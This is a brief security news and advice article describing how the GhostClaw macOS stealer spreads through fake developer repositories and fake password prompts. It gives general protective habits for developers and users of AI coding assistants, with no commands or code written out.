A new macOS information stealer called GhostClaw is spreading across GitHub and AI developer tools. Instead of relying on complex software exploits, this malware takes advantage of the normal routines developers follow every day. It hides inside fake software development kits, trading tools, and utility repositories.
Because developers are so used to copying setup commands directly from project instructions, GhostClaw easily slips right onto their machines. It works by making the malicious code look like a standard software installation step.
How the GhostClaw attack actually works
Once a developer runs a contaminated install command, the malware quietly downloads a remote script in the background. It doesn’t hack into the core of the Mac system. It simply triggers fake password prompts that look exactly like standard Apple security pop-ups. When users type in their credentials, GhostClaw steals that data.
The problem gets worse with automated AI coding assistants. These tools often fetch and run external code blocks automatically, which bypasses normal human review completely.
There are many ways to protect your computer
You can stop this threat by changing a few daily habits. Don’t run any command that pipes straight into your terminal without reading it first. Download scripts and check the code yourself. It’s also smart to look at a GitHub repository’s history. Sudden changes to setup instructions or suspicious gaps in updates are big warning signs.
Finally, avoid giving system permissions unless you are sure about the tool asking for them. Limit what your automated coding extensions can run on their own.
